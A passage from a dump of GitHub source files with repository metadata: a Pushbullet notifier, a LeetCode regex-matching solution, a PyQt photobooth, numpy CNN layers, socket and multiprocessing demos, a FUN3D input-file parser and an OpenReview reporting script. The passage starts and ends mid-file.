self._sendPushbullet(pushbullet_api=None, event=ui_error.title, message=ui_error.message)\n\n def _sendPushbullet(self, pushbullet_api=None, pushbullet_device=None, pushbullet_channel=None, event=None, message=None, link=None, force=False):\n if not (settings.USE_PUSHBULLET or force):\n return False\n\n pushbullet_api = pushbullet_api or settings.PUSHBULLET_API\n pushbullet_device = pushbullet_device or settings.PUSHBULLET_DEVICE\n pushbullet_channel = pushbullet_channel or settings.PUSHBULLET_CHANNEL\n\n logger.debug(\"Pushbullet event: {0!r}\".format(event))\n logger.debug(\"Pushbullet message: {0!r}\".format(message))\n logger.debug(\"Pushbullet api: {0!r}\".format(pushbullet_api))\n logger.debug(\"Pushbullet devices: {0!r}\".format(pushbullet_device))\n\n post_data = {\"title\": event, \"body\": message, \"type\": \"link\" if link else \"note\"}\n if link:\n post_data[\"url\"] = link\n\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n\n if pushbullet_device:\n post_data[\"device_iden\"] = pushbullet_device\n elif pushbullet_channel:\n post_data[\"channel_tag\"] = pushbullet_channel\n\n response = helpers.getURL(urljoin(self.url, \"pushes\"), session=self.session, post_data=post_data, headers=headers, returns=\"json\") or {}\n\n failed = response.pop(\"error\", {})\n if failed:\n 
logger.warning(\"Pushbullet notification failed: {0}\".format(failed.pop(\"message\")))\n else:\n logger.debug(\"Pushbullet notification sent.\")\n\n return False if failed else True\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/notifiers/pushbullet.py","file_name":"pushbullet.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"26879874304","text":"# Given an input string (s) and a pattern (p), implement regular expression matching with support for '.' and '*'.\n#\n# '.' Matches any single character.\n# '*' Matches zero or more of the preceding element.\n# The matching should cover the entire input string (not partial).\n#\n# Note:\n#\n# s could be empty and contains only lowercase letters a-z.\n# p could be empty and contains only lowercase letters a-z, and characters like . or *.\n# Example 1:\n#\n# Input:\n# s = \"aa\"\n# p = \"a\"\n# Output: false\n# Explanation: \"a\" does not match the entire string \"aa\".\n# Example 2:\n#\n# Input:\n# s = \"aa\"\n# p = \"a*\"\n# Output: true\n# Explanation: '*' means zero or more of the preceding element, 'a'. Therefore, by repeating 'a' once, it becomes \"aa\".\n# Example 3:\n#\n# Input:\n# s = \"ab\"\n# p = \".*\"\n# Output: true\n# Explanation: \".*\" means \"zero or more (*) of any character (.)\".\n# Example 4:\n#\n# Input:\n# s = \"aab\"\n# p = \"c*a*b\"\n# Output: true\n# Explanation: c can be repeated 0 times, a can be repeated 1 time. Therefore, it matches \"aab\".\n# Example 5:\n#\n# Input:\n# s = \"mississippi\"\n# p = \"mis*is*p*.\"\n# Output: false\n\n\nclass Solution:\n def isMatch(self, string: str, pattern: str) -> bool:\n \"\"\"\n # string = aa\n # pat = a* True\n\n # s = \"aab\"\n # p = \"c*a*b\" True\n\n # s = \"mississippi\"\n # p = \"mis*is*[]p*.\" False\n\n # '.' Matches any single character. [a-zA-Z0-9_]\n # '*' Matches zero or more of the preceding element\n\n We use a boolean 2D matrix where\n dp[i][j] reprs does pattern[:j] match string[:i]\n 0 1 2 3 4 5 6 7 8\n # '' . * b c . * . e\n # 0 '' T T T T T T T T T\n # 1 a F T\n # 2 b F\n # 3 c F\n # 4 b F\n # 5 b F\n # 6 e F\n \"\"\"\n return self.dp_soln(string, pattern)\n\n def dp_soln(self, string: str, pattern: str) -> bool:\n dp = [[False] * (len(pattern) + 1) for _ in range(len(string) + 1)]\n\n dp[0][0] = True\n # deal with patterns like a*, .*, a*b*\n for i in range(1, len(pattern) + 1):\n if pattern[i - 1] == '*':\n dp[0][i] = dp[0][i - 2]\n\n for i in range(1, len(string) + 1):\n for j in range(1, len(pattern) + 1):\n if pattern[j - 1] in {string[i - 1], '.'}:\n dp[i][j] = dp[i - 1][j - 1]\n elif pattern[j - 1] == '*':\n dp[i][j] = dp[i][j - 2] # use zero elems for *\n if pattern[j - 2] == '.' 
or pattern[j - 2] == string[i - 1]:\n dp[i][j] = dp[i][j - 2] or dp[i - 1][j]\n else:\n dp[i][j] = False\n\n return dp[-1][-1]\n\n\n\"\"\"\nRuntime: 52 ms, faster than 61.10% of Python3 online submissions for Regular Expression Matching.\nMemory Usage: 14.1 MB, less than 5.55% of Python3 online submissions for Regular Expression Matching.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_3/p0010_regular_expression_matching.py","file_name":"p0010_regular_expression_matching.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74423519146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with This program. If not, see .\n\nimport sys\nimport cv\nfrom PyQt4 import uic, QtGui, QtCore\nfrom cv2 import *\nfrom photo import Photo\nfrom settings import AUTO_PRINT, PATCH_BACKGROUND_IMG, PATCH_LOGO_IMG\n\n\nclass PyPhotoBooth:\n def __init__(self):\n self.photo = Photo()\n self.photo_live = True\n self.global_count = 0\n self.MainWindow = uic.loadUi('main.ui')\n self.webcam = cv.CreateCameraCapture(-1)\n self.timer = QtCore.QTimer(self.MainWindow)\n self.MainWindow.connect(\n self.timer, QtCore.SIGNAL('timeout()'), self.show_frame\n )\n self.MainWindow.connect(\n self.MainWindow.pushButton, QtCore.SIGNAL(\"clicked()\"),\n self.take_photo\n )\n if AUTO_PRINT:\n self.MainWindow.pushButton_2.hide()\n else:\n self.MainWindow.connect(\n self.MainWindow.pushButton_2, QtCore.SIGNAL(\"clicked()\"),\n self.print_photo_button\n )\n if PATCH_BACKGROUND_IMG is not None:\n palette = QtGui.QPalette()\n palette.setBrush(\n QtGui.QPalette.Background, QtGui.QBrush(\n QtGui.QPixmap(PATCH_BACKGROUND_IMG)\n )\n )\n self.MainWindow.setPalette(palette)\n if PATCH_LOGO_IMG is not None:\n self.MainWindow.lbllogo.setPixmap(\n QtGui.QPixmap(PATCH_LOGO_IMG)\n )\n self.timer.start(1)\n\n def take_photo(self):\n self.photo.take(self)\n\n def print_photo_button(self):\n result, count = self.photo.printing(self.global_count)\n if result:\n self.MainWindow.lcdNumber.display(0)\n self.MainWindow.lcdNumber.repaint()\n self.MainWindow.pick_01.setText(' ')\n self.MainWindow.pick_01.repaint()\n self.MainWindow.pick_02.setText(' ')\n self.MainWindow.pick_02.repaint()\n self.MainWindow.pick_03.setText(' ')\n self.MainWindow.pick_03.repaint()\n self.global_count = count\n\n def show_frame(self):\n if self.photo_live:\n ipl_image = cv.QueryFrame(self.webcam)\n data = ipl_image.tostring()\n image = QtGui.QImage(\n data, ipl_image.width, ipl_image.height, ipl_image.channels\n * ipl_image.width, QtGui.QImage.Format_RGB888)\n pixmap = QtGui.QPixmap()\n pixmap.convertFromImage(image.rgbSwapped())\n self.MainWindow.lblWebcam.setPixmap(pixmap)\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n pyphotobooth = PyPhotoBooth()\n pyphotobooth.MainWindow.show()\n 
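# start the Qt event loop; this call blocks until the window is closed\n    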
app.exec_()\n","repo_name":"ElDwarf/PyPhotoBooth","sub_path":"src/PyPhotoBooth.py","file_name":"PyPhotoBooth.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5376436727","text":"import numpy as np\nfrom scipy import signal as sg\n\n# MARK - FUNCTION DEFINITION\n# Sigmoid\ndef sigmoid(x, deriv=False):\n # if the deriv==True then calculate the derivative instead\n if(deriv):\n return x*(1-x)\n\n return 1/(1+np.exp(-x))\n\ndef tanh(x, deriv=False):\n if (deriv):\n return 1 - (x ** 2)\n\n return 2 / (1 + np.exp(-2 * x)) - 1\n\n# Rectified Linear Unit\n# Calculate relu of given x\ndef relu(x, deriv=False):\n # if the deriv==True then calculate the derivative instead\n if (deriv):\n return (x > 0) * 1\n\n return np.maximum(0, x)\n\ndef elu(x, a=0.1, deriv=False):\n if (deriv):\n return np.where(x >= 0, 1, x + a)\n\n return np.where(x >= 0, x, a * (np.exp(x) - 1))\n\n# Zero Pad\n# Adding zero padding to 4D matrix\ndef zero_pad(x, p):\n # Input matrix x must 4D\n assert x.ndim == 4, 'Input not 4D matrix'\n\n # Define which part of the matrix we want to pad\n npad = ((0,0), (p,p), (p,p), (0,0))\n # Return padding calculation result\n return np.pad(x, pad_width=npad, mode='constant', constant_values=0)\n\n# Size After Convolve\n# Calculate size of given x after forward calculation with given f=filter, p=padding, s=stride\ndef size_after_forward(x, f, p=0, s=1):\n return (x - f + 2 * p) / s + 1\n\n# Size Before Convolve\n# Calculate size of given x after backward calculation with given f=filter, p=padding, s=stride\ndef size_after_backward(x, f, p=0, s=1):\n return x * s + f - s - 2 * p\n\n# Max Pooling\n# Calculate Max Pooling of given x=input (3D Matrix) with given f=filter size and s=stride\ndef max_pooling(x, h, w):\n # Input matrix x must 3D\n assert x.ndim == 3, 'Input not 3D matrix'\n\n # Calculate result dimension\n depth = x.shape[2]\n height = size_after_forward(x.shape[0], h, s=h)\n width = size_after_forward(x.shape[1], w, s=w)\n # Initialize result & switch with zero value\n result = np.zeros((height, width, depth))\n switch = np.zeros((height, width, depth))\n\n # Loop through depth of the input\n for i in xrange(depth):\n # Loop through height of the input\n for j in xrange(height):\n # Loop through width of the input\n for k in xrange(width):\n # Calculate max value from filter area of the input\n result[j, k, i] = np.max(x[j*h:j*h+h, k*w:k*w+w, i])\n # Keep track of max index\n switch[j, k, i] = np.argmax(x[j*h:j*h+h, k*w:k*w+w, i])\n\n # Return result and switch value\n return (result, switch)\n\n# Max Pooling\n# Calculate Max Pooling of given x=input (3D Matrix) with given f=filter size and s=stride\ndef unmax_pooling(x, switch, h, w):\n # Input matrix x must 3D\n assert x.ndim == 3, 'Input not 3D matrix'\n\n # Calculate result dimension\n depth = x.shape[2]\n height = size_after_backward(x.shape[0], h, s=h)\n width = size_after_backward(x.shape[1], w, s=w)\n # Initialize result with zero value\n result = np.zeros((height, width, depth))\n\n # Loop through depth of the input\n for i in xrange(x.shape[2]):\n # Loop through height of the input\n for j in xrange(x.shape[0]):\n # Loop through width of the input\n for k in xrange(x.shape[1]):\n # Calculate max value from filter area of the input\n r_index = int((j * h) + (switch[j, k, i] / w))\n c_index = int((k * w) + (switch[j, k, i] % w))\n\n result[r_index, c_index, i] = x[j, k, i]\n\n # Return result and switch value\n return 
result\n\n# Forward Convolution\n# Calculate feed forward convolution layer for given x=input, filters, and p=padding\ndef forward_conv(x, filters, bias, p=0):\n # Initialize result value with size according to x and filters\n result = np.zeros((x.shape[0], size_after_forward(x.shape[1], filters.shape[1], p), size_after_forward(x.shape[2], filters.shape[2], p), filters.shape[0]))\n\n # Adding zero padding if p != 0\n if (p > 0): x = zero_pad(x, p)\n\n # Convolve each input with each filter\n # Looping through each input\n for i in xrange(x.shape[0]):\n # Looping through each filters\n for j in xrange(filters.shape[0]):\n # Do convolve computation\n # 'valid' means that there is no zero padding\n # Convolve computation resulting 3D matrix so convert it to 2D matrix\n result[i, :, :, j] = (sg.convolve(x[i], filters[j], 'valid')).reshape((result.shape[1], result.shape[2])) + bias[j]\n\n # Call ReLU function (Activation function) for each value\n # Return the ReLU result\n return relu(result)\n\n# Backward Convolution\n# Calculate gradient and delta from given parameters\ndef backward_conv(x, y, error_y, filters, p=0, s=1):\n # Backprop through relu layer first\n delta_y = relu(y, deriv=True) * error_y\n\n # Adding zero padding if p != 0\n if (p > 0): x = zero_pad(x, p)\n\n # Initialize result variable\n delta_result = np.zeros(x.shape)\n gradient_result = np.zeros(filters.shape)\n bias_update_result = np.zeros((delta_y.shape[3]))\n\n # Loop through each delta_y\n for i in xrange(delta_y.shape[0]):\n # Loop through each filters\n # Filters count == dconv\n for j in xrange(filters.shape[0]):\n # Get single layer(2D) from delta input\n s = delta_y[i, :, :, j].reshape((delta_y.shape[1], delta_y.shape[2], 1))\n # Flip the filters along its axis\n f = np.fliplr(np.flipud(filters[j]))\n # Full convolve the delta layer with its corresponded filter\n r = sg.convolve(s, f, 'full')\n # Ignore pad if there is a padding in forward conv\n delta_result[i] += r\n\n # Loop through each image input\n # image count == delta count\n for i in xrange(x.shape[0]):\n # Loop through each delta depth\n for j in xrange(delta_y.shape[3]):\n # Get single layer(2D) from delta input\n f = delta_y[i, :, :, j].reshape((delta_y.shape[1], delta_y.shape[2], 1))\n # Convolve image input with its corresponded delta from next layer\n gradient_result[j] += sg.convolve(x[i], f, 'valid')\n\n # Calculate bias update\n for i in xrange(filters.shape[0]):\n # sum delta_y\n bias_update_result[i] = np.sum(delta_y[:, :, :, i])\n\n # Trim delta result if padded\n if (p > 0): delta_result = delta_result[:, p:-p, p:-p, :]\n\n # Return the delta and gradient result\n return (delta_result, gradient_result, bias_update_result)\n\n\n# Forward Pooling\n# Calculate feed forward pooling layer\ndef forward_pool(x, h, w):\n # Initialize result dimension after pooling\n result = np.zeros((x.shape[0], size_after_forward(x.shape[1], h, s=h), size_after_forward(x.shape[2], w, s=w), x.shape[3]))\n switch = np.zeros(result.shape)\n\n # loop through all input and do max pooling\n for i in xrange(x.shape[0]):\n # Do max pooling\n result[i], switch[i] = max_pooling(x[i], h, w)\n\n # return the result\n return (result, switch)\n\n# Backward Pooling\n# Calculate backward pooling layer\ndef backward_pool(x, switch, h, w):\n # Initialize result dimension after backward pool\n result = np.zeros((x.shape[0], size_after_backward(x.shape[1], h, s=h), size_after_backward(x.shape[2], w, s=w), x.shape[3]))\n\n # loop through all input and do unmax pooling\n for i in 
xrange(x.shape[0]):\n # Do unmax pooling\n result[i] = unmax_pooling(x[i], switch[i], h, w)\n\n # return the result\n return result\n\n# Forward Softmax\n# Calculate forward Softmax Layer\ndef forward_softmax(x, target):\n exp_scores = np.exp(x)\n probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True)\n\n # Calculate data loss\n correct_logprobs = -np.log(probs[range(len(target)), target])\n data_loss = np.sum(correct_logprobs)\n data_loss *= 1. / len(target)\n\n # Return the probability and data loss\n return probs, data_loss\n\n# Backward Softmax\n# Calculate backward Softmax Layer\ndef backward_softmax(x, target):\n d = x\n d[range(len(target)), target] -= 1\n\n # Return the scores after backward\n return d\n","repo_name":"sugab/cnn","sub_path":"Pre-Midterm/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72249601707","text":"\"\"\"\nNon-blocking socket server demo:\nevery 3 seconds, append the would-block error to the log file.\n\"\"\"\nfrom socket import *\nimport time,os\nf=open(\"log.txt\",\"a+\")\ns=socket()\ns.bind((\"127.0.0.1\",9609))\ns.listen(5)\n# put s into non-blocking mode\ns.setblocking(False)\nif __name__ == '__main__':\n while True:\n print(\"waiting for a connection\")\n try:\n conn,addr=s.accept()\n except BlockingIOError as e:\n time.sleep(3)\n f.write(\"%s : %s\\n\"%(time.ctime(),e))\n f.flush()\n except Exception:\n f.close()\n s.close()\n os._exit(0)\n else:\n print(\"connection from %s\" % addr)\n\n","repo_name":"zykgithub1/pythonClass","sub_path":"daneiPythonClass/2021_7_7/block_Io.py","file_name":"block_Io.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11993102264","text":"from concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import Pool\n\nimport numpy as np\nimport multiprocessing\nimport time\n\n\ndef writer(filename, n):\n start = time.time()\n print(\"Let's run: \", time.time())\n with open(filename, 'w') as file:\n for i in range(n):\n file.write('1')\n\n print(\"Finish: \", time.time() - start)\n\n\ndef mega_array(length: int, name: str):\n start = time.time()\n print(\"Let's run: \", time.time())\n\n temp_list = []\n for i in range(length):\n temp_list.append(i)\n\n print(len(temp_list))\n print(\"Finish: \", time.time() - start)\n\n return temp_list\n\n\ndef f(x, y):\n return x*y\n\n\nif __name__ == '__main__':\n cores = 6\n\n # multiprocessing.Process\n # writer('test.txt', 5_000_000 * cores)\n\n # for i in range(cores):\n # t = multiprocessing.Process(target=writer, args=(f'test{i}.txt', 5_000_000))\n # t.start()\n #\n # print(\"All Threads are queued, let's see when they finish!\")\n\n # multiprocessing.Pool\n # print(len(mega_array(5_000_000 * cores)))\n # input()\n #\n # p = multiprocessing.Pool(cores)\n # return_to_list = p.map(mega_array, [5_000_000] * cores)\n #\n # print(len(list(np.concatenate(return_to_list))))\n\n values = [5_000_000] * cores\n names = ['names'] * cores\n p = multiprocessing.Pool(cores)\n array = p.starmap(mega_array, zip(values, names))\n\n print(len(array))\n print('already here')\n\n","repo_name":"apokrif333/Parallelism","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30948711907","text":"r\"\"\"\nThis is a module for interacting with FUN3D input files that define \ngeometry for 
adaptation. Files defined in the FAUXGeom file \n``faux_input`` can have their surface meshes refined while other \nsurfaces must be frozen.\n\n:See also:\n    * :func:`cape.pyfun.cntl.Cntl.ReadFAUXGeom`\n    * :func:`cape.pyfun.cntl.Cntl.PrepareFAUXGeom`\n    * :func:`cape.pyfun.cntl.Cntl.ReadFreezeSurfs`\n    * :func:`cape.pyfun.cntl.Cntl.PrepareFreezeSurfs`\n\"\"\"\n\n# System modules\nimport os.path\n\n# Base this class off of the main file control class.\nclass FAUXGeom(object):\n    r\"\"\"File control class for :file:`faux_input`\n    \n    :Call:\n        >>> faux = pyFun.FAUXGeom()\n    :Inputs:\n        *fname*: :class:`str`\n            Name of ``faux_input`` file or template\n    :Outputs:\n        *faux*: :class:`pyFun.faux.FAUXGeom`\n            Interface for ``faux_input`` file\n        *faux.nSurf*: :class:`int`\n            Number of MapBC surfaces with geometry descriptions\n        *faux.Surfs*: :class:`list`\\ [:class:`int`]\n            List of surface indices\n        *faux.Geom*: :class:`dict` (:class:`float` | :class:`list`)\n            Dictionary of geometry definitions\n    :Versions:\n        * 2017-02-23 ``@ddalle``: First version\n    \"\"\"\n    \n    # Initialization method (not based off of FileCntl)\n    def __init__(self, fname=\"faux_input\"):\n        r\"\"\"Initialization method\n        \n        :Versions:\n            * 2017-02-23 ``@ddalle``: First version\n        \"\"\"\n        # Save the file name.\n        self.fname = fname\n        # Initialize\n        self.Surfs = []\n        self.Geom = {}\n        self.nSurf = 0\n        # Read the file\n        if (fname is not None) and os.path.isfile(fname):\n            self.Read(fname)\n    \n    # String representation\n    def __repr__(self):\n        \"\"\"String representation\n        \n        :Versions:\n            * 2017-04-08 ``@ddalle``: First version\n        \"\"\"\n        return \"<FAUXGeom '%s', nSurf=%i>\" % (self.fname, self.nSurf)\n    \n    \n    # Read a ``faux_input`` file or template\n    def Read(self, fname):\n        r\"\"\"Read a ``faux_input`` input file or template\n        \n        :Call:\n            >>> faux.Read(fname)\n        :Inputs:\n            *fname*: :class:`str`\n                Name of ``faux_input`` file or template\n        :Versions:\n            * 2017-02-23 ``@ddalle``: First version\n        \"\"\"\n        # Open the file\n        lines = open(fname).readlines()\n        # Initialize\n        self.Surfs = []\n        self.Geom = {}\n        # Loop through lines\n        i = 1\n        nline = len(lines)\n        while i < nline:\n            # Get the values\n            V = self.ConvertToVal(lines[i])\n            # Check contents\n            if len(V) < 3:\n                raise ValueError(\n                    (\"Failure reading FAUXGeom line:\\n%s\\n\" % lines[i]) +\n                    (\"Must be surface ID (int), geom type (str), and coord\"))\n            # Get the type\n            typ = V[1]\n            # Check it\n            if typ in [\"xplane\", \"yplane\", \"zplane\"]:\n                # Valid x-plane, y-plane, or z-plane\n                self.Geom[V[0]] = {V[1]: V[2]}\n            elif typ in [\"general_plane\"]:\n                # Read the next line, which is the normal\n                i += 1\n                n = self.ConvertToVal(lines[i])\n                # Valid general plane\n                self.Geom[V[0]] = {V[1]: V[2], \"normal\": n}\n            # Check if surface already counted\n            if V[0] not in self.Surfs:\n                # Increase surface count\n                self.nSurf += 1\n                # Add to the list\n                self.Surfs.append(V[0])\n            # Move to next line\n            i += 1\n        # Sort surface list\n        self.Surfs.sort()\n    \n    # Convert a string to a value\n    def ConvertToVal(self, val):\n        r\"\"\"Convert a text description to a Python value\n        \n        :Call:\n            >>> v = faux.ConvertToVal(val)\n        :Inputs:\n            *faux*: :class:`pyFun.faux.FAUXGeom`\n                Interface for ``faux_input`` file\n            *val*: :class:`str` | :class:`unicode`\n                Text of the value from file\n        :Outputs:\n            *v*: :class:`str` | :class:`int` | :class:`float` | \n                :class:`list`\n                Evaluated value of the text\n        :Versions:\n            * 2017-02-23 ``@ddalle``: First version\n        \"\"\"\n        # Check inputs\n        if type(val).__name__ not in ['str', 'unicode']:\n            # Not text; return as is\n            return val\n        # 
Initialize output\n V = []\n # Loop through parts\n for vi in val.split():\n # Attempt to interpret as an integer\n try:\n V.append(int(vi))\n continue\n except Exception:\n pass\n # Attempt to interpret as a float\n try:\n V.append(float(vi))\n except Exception:\n # Just keep as a string\n V.append(vi)\n # Output (list if needed)\n if len(V) == 1:\n # Single output\n return V[0]\n else:\n # Return list\n return V\n \n # Set value for a plane\n def SetGeom(self, comp, geom):\n r\"\"\"Set geometry definition for a component\n \n :Call:\n >>> faux.SetGeom(comp, geom)\n :Inputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *comp*: :class:`int`\n Component index\n *geom*: :class:`dict`\n Geometry description\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Check if component already defined.\n if comp not in self.Surfs:\n # Append the component\n self.Surfs.append(comp)\n # Sort again\n self.Surfs.sort()\n # Increase count\n self.nSurf += 1\n # Save the instruction\n self.Geom[comp] = geom\n \n # Write a ``faux_input`` file\n def Write(self, fname=\"faux_input\"):\n r\"\"\"Write FAUXGeom input file\n \n :Call:\n >>> faux.Write(fname=\"faux_input\")\n :Inputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *fname*: {``\"faux_input\"``} | :class:`str`\n Name of file to write\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Open the file\n f = open(fname, 'w')\n # Write the number of surfaces.\n f.write('%i\\n' % self.nSurf)\n # Loop through instructions\n for comp in self.Surfs:\n # Get the instruction\n geom = self.Geom[comp]\n # Check the type\n if 'general_plane' in geom:\n # Write a generic plane\n f.write(\" %i general_plane %s\" % (comp,geom[\"general_plane\"]))\n # Write the normal\n f.write(\" \")\n f.write(\" \".join([str(v) for v in geom[\"normal\"]]))\n f.write(\"\\n\")\n elif 'xplane' in geom:\n # Write the xplane\n f.write(\" %i xplane %s\\n\" % (comp, geom[\"xplane\"]))\n elif 'yplane' in geom:\n # Write the xplane\n f.write(\" %i yplane %s\\n\" % (comp, geom[\"yplane\"]))\n elif 'zplane' in geom:\n # Write the xplane\n f.write(\" %i zplane %s\\n\" % (comp, geom[\"zplane\"]))\n # Close the file\n f.close()\n \n","repo_name":"nasa/cape","sub_path":"cape/pyfun/faux.py","file_name":"faux.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"33316834484","text":"import tensorflow as tf\n\n# create constant nodes\nnode_a = tf.constant(3.0, tf.float32)\nnode_b = tf.constant(4.0)\n\n# Method1\n# sess = tf.Session()\n# print(sess.run([node1, node2]))\n# sess.close()\n\n# Method2\nwith tf.Session() as sess:\n output = sess.run([node_a, node_b])\n print(output)\n","repo_name":"dinkar1708/machine-learning-examples","sub_path":"tensorflow-example/tensor_constant.py","file_name":"tensor_constant.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13925584750","text":"def fact(n):\n\n if n==1:\n return 1\n #5! 
= 5 * 4\n    result = n*fact(n-1)\n    return result\n\ndef fibo(n):\n\n    if n < 2:\n        return n\n\n    r1 = fibo(n-1)\n    r2 = fibo(n-2)\n    return r1 + r2\n\nprint(fibo(4))\n#print(fact(5))\n\ndef fibo_m(n):\n    # memoized Fibonacci\n    if memo[n] > 0: # if the value is already cached:\n        return memo[n]\n    else:\n        memo[n] = fibo_m(n-1) + fibo_m(n-2)\n        return memo[n]\n\nn = 10\nmemo = [0] * (n+1) # table of cached values, usable up to index n\nmemo[0] = 0\nmemo[1] = 1\nprint(fibo_m(n))\n\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/0818_재귀.py","file_name":"0818_재귀.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25815244939","text":"def solution(s):\n    result = s\n    numstr = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']\n\n    for j in range(len(numstr)):\n        if numstr[j] in s:\n            result = result.replace(numstr[j], str(j))\n    return int(result)\n\nif __name__ == '__main__':\n    s = 'one4seveneight'\n    print(solution(s))","repo_name":"KimSejun-bigd/coding_test","sub_path":"programmers/PROG_숫자 문자열과 영단어.py","file_name":"PROG_숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2790805877","text":"import argparse\nimport openreview\nimport requests\nimport csv\nimport sys, getopt\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\nparser.add_argument('--ofile', help=\"output file name\")\nparser.add_argument('--name', help=\"name of the track: conference or workshop\")\nargs = parser.parse_args()\n\n## Initialize the client library with username and password\nif args.username!=None and args.password!=None:\n    client = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\nelse:\n    client = openreview.Client(baseurl=args.baseurl)\n## Initialize output file name\nfile_name = \"output.csv\"\nif args.ofile!=None:\n    file_name = args.ofile\n## Initialize output file type - check for valid values\noutput_type = 2\n\nconference = 'conference'\nif args.name:\n    conference = args.name\n\nclass PaperStatus:\n    Unassigned, Assigned, Commented, Reviewed, FullyReviewed = range(5)\n\nPaperStatusString = [\"Unassigned\", \"Assigned\", \"Commented\", \"Reviewed\", \"FullyReviewed\"]\n\n\n# get the info from the review, return NA if not there\ndef get_score(content_type):\n    string_var = note.content.get(content_type, \"NA\")\n    string_var = string_var.split(':')[0]\n    return string_var\n\n# pull all needed info from the database\nsubmissions = client.get_notes(invitation='ICLR.cc/2017/' + conference + '/-/submission')\ninvitation = \"official/review\"\nheaders = {'User-Agent': 'test-create-script', 'Content-Type': 'application/json',\n           'Authorization': 'Bearer ' + client.token}\nanon_reviewers = requests.get(client.baseurl + '/groups?id=ICLR.cc/2017/' + conference + '/paper.*/AnonReviewer.*',\n                              headers=headers)\ncurrent_reviewers = requests.get(client.baseurl + '/groups?id=ICLR.cc/2017/' + conference + '/paper.*/reviewers',\n                                 headers=headers)\nnotes = client.get_notes(invitation='ICLR.cc/2017/' + conference + '/-/paper.*/' + invitation)\n\n# The following are dictionaries to connect the papers, reviewers and reviews\n# \tthe signature is the whole directory struct leading up 
to the Anonymized name\n# \tex ICLR.cc/2017/conference/-/paper203/AnonReviewer1\n# reviews[signature] = the review note\nreviews = {}\n# reviewers[signature] = reviewer_name\nreviewers = {}\n# reviewers_by_paper[paper_num][reviewer_name] = review\nreviewers_by_paper = {}\n# paper_status[paper_num] dictionary w/ 'title' (paper title),'count'(number of reviewers),\n#\t\t\t\t\t\t\t\t\t\t\t\t\t 'reviewed', 'percent'(percentage reviewed)\npaper_status = {}\n\n# initialize paper_status for each submission and attach title to paper number\nfor paper in submissions:\n paper_status[paper.number] = {}\n paper_status[paper.number]['title'] = paper.content['title']\n paper_status[paper.number]['count'] = 0\n paper_status[paper.number]['reviewed'] = 0\n paper_status[paper.number]['percent'] = 0\n reviewers_by_paper[paper.number] = {}\n\n# attach review note to the anonymized name\nfor n in notes:\n signature = n.signatures[0]\n reviews[signature] = n\n\n# attach real name to the anonymized name\nfor r in anon_reviewers.json():\n reviewer_id = r['id']\n members = r['members']\n if members:\n reviewers[reviewer_id] = members[0]\n else:\n paper_num = int(reviewer_id.split('paper')[1].split('/Anon')[0])\n if paper_num in paper_status:\n # check if paper wasn't deleted then why is reviewer missing?\n if output_type == 1:\n my_file.write('Reviewer ' + reviewer_id + ' is anonymous\\n')\n else:\n print('Reviewer ' + reviewer_id + ' is anonymous')\n\n# attach reviewers to paper_num\n# add review status paper_status\nfor r in current_reviewers.json():\n reviewer_id = r['id']\n members = r['members']\n if members:\n paper_num = int(reviewer_id.split('paper')[1].split('/reviewers')[0])\n if paper_num in paper_status:\n # if the number isn't in paper_status it means the submission was deleted\n for m in members:\n # add reviewers\n reviewer_name = reviewers.get(m, m)\n reviewers_by_paper[paper_num][reviewer_name] = reviews.get(m, None)\n paper_status[paper_num]['count'] += 1\n if reviewers_by_paper[paper_num][reviewer_name] != None:\n paper_status[paper_num]['reviewed'] += 1\n\n# now that all reviewers have been added to the paper_status\n# for each paper determine how many reviewers have completed reviewing\nfor paper_num in paper_status:\n paper_data = 